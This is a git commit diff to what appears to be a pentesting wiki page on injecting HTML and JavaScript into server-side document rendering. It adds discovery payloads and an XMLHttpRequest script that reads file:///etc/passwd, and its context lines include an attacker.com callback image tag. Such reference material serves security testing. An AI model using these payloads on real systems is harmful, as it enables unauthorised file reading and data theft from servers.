GitBook: [master] one page modified
This commit is contained in:
parent
f822e925d0
commit
52c3234894
@ -13,8 +13,10 @@ Also, note that in a regular exploitation you will be **able to see/download the
|
||||
### Discovery
|
||||
|
||||
```markup
|
||||
<!-- Basic discovery, Write "test"-->
|
||||
<!-- Basic discovery, Write somthing-->
|
||||
<img src="x" onerror="document.write('test')" />
|
||||
<script>document.write(JSON.stringify(window.location))</script>
|
||||
<script>document.write('<iframe src="'+window.location.href+'"></iframe>')</script>
|
||||
|
||||
<!--Basic blind discovery, load a resource-->
|
||||
<img src="http://attacker.com"/>
|
||||
@ -65,7 +67,17 @@ The best conformable way to exploit this vulnerability is to abuse the vulnerabi
|
||||
x=new XMLHttpRequest;
|
||||
x.onload=function(){document.write(btoa(this.responseText))};
|
||||
x.open("GET","file:///etc/passwd");x.send();
|
||||
</script>
|
||||
</script>
|
||||
```
|
||||
|
||||
```markup
|
||||
<script>
|
||||
xhzeem = new XMLHttpRequest();
|
||||
xhzeem.open("GET","file:///etc/passwd");
|
||||
xhzeem.send();
|
||||
xhzeem.onload = function(){document.write(this.responseText);}
|
||||
xhzeem.onerror = function(){document.write('failed!')}
|
||||
</script>
|
||||
```
|
||||
|
||||
```markup
|
||||
|
Loading…
Reference in New Issue
Block a user